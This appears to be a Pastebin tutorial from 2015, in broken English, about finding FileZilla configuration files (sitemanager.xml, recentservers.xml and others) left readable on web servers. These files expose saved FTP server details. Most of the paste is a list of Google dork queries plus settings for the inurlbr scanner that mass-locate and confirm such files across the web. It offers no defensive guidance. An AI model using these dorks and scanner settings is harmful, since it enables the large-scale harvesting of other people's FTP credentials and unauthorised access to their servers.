API tools faq
paste
Kyfx

XML FIREZILLA DOWNLOAD DORK

Kyfx
Aug 24th, 2015
258
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.52 KB | None | 0 0
raw download clone embed print report
  1. Quick connect
  2. QuickConnect lets you connect to servers without adding them to your administrative panel. when instaciado a fast connection it is added in recentservers.xml file.
  3.  
  4. Danger?
  5. Yes the same way that you can read these files. Malicious applications can do the same, and can be read also on web servers.
  6. ex:
  7. www.target.com.br/folder/{file.xml}
  8. www.target.com.br/microsite/geo243/FileZilla.xml www.target.com.br/149224/prg/programok/Total%20Commander/FileZilla/recentservers.xml
  9.  
  10. Other files:
  11. sitemanager.xml
  12. recentservers.xml
  13. filezilla.xml
  14. bookmarks.xml
  15. filters.xml
  16. layout.xml
  17. queue.xml
  18. Looking for vulnerable servers
  19. Now let's use the inurlbr tool to search sites with such breach and confirm such information.
  20. Download tool:
  21. https://github.com/googleinurl/SCANNER-INURLBR
  22.  
  23. Setting command:
  24. using search engines..
  25.  
  26. SET DORK:
  27. Choose your dork search
  28.  
  29. "\FileZilla\" ext:xml
  30. inurl:"\FileZilla\" & inurl:sitemanager.xml -github -sourceforge
  31. inurl:"\FileZilla\" & inurl:recentservers.xml -github -sourceforge
  32. inurl:"\FileZilla\" & inurl:filezilla.xml -github -sourceforge
  33. inurl:"\FileZilla\" & inurl:bookmarks.xml -github -sourceforge
  34. inurl:"\FileZilla\" & inurl:filters.xml -github -sourceforge
  35. inurl:"\FileZilla\" & inurl:layout.xml -github -sourceforge
  36. inurl:"\FileZilla\" & inurl:queue.xml -github -sourceforge
  37. inurl:sitemanager.xml & ext:xml & -github -sourceforge
  38. inurl:recentservers.xml & ext:xml & -github -sourceforge
  39. inurl:filezilla.xml & ext:xml & -github -sourceforge
  40. inurl:bookmarks.xml & ext:xml & -github -sourceforge
  41. inurl:filters.xml & ext:xml & -github -sourceforge
  42. inurl:layout.xml & ext:xml & -github -sourceforge
  43. inurl:queue.xml & ext:xml & -github -sourceforge
  44. inurl:"\FileZilla\" & inurl:(sitemanager.xml | recentservers.xml | filezilla.xml | filters.xml | bookmarks.xml | layout.xml | queue.xml) ext:xml -github -sourceforge
  45. --dork 'YOU_DORK'
  46. - Setting: --dork '"\FileZilla\" ext:xml'
  47.  
  48. SET FILE OUTPUT:
  49. - Setting: -s filezilla.txt
  50.  
  51. SET TIPE VALIDATION:
  52. - Setting: -t 2
  53. 2 The second type tries to valid the error defined by: -a 'VALUE_INSIDE_THE _TARGET' It also establishes connection with the exploit through the get method.
  54.  
  55. SET STRING VALIDATION:
  56. Specify the string that will be used on the search script:
  57. Example: -a {string}
  58. Usage: -a '<title>hello world</title>'
  59. If specific value is found in the target he is considered vulnerable.
  60. - Setting: -a '<FileZilla3>'
  61. All filezilla file there is a primary tag called <FileZilla3>. It is trough this that we will validate.
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!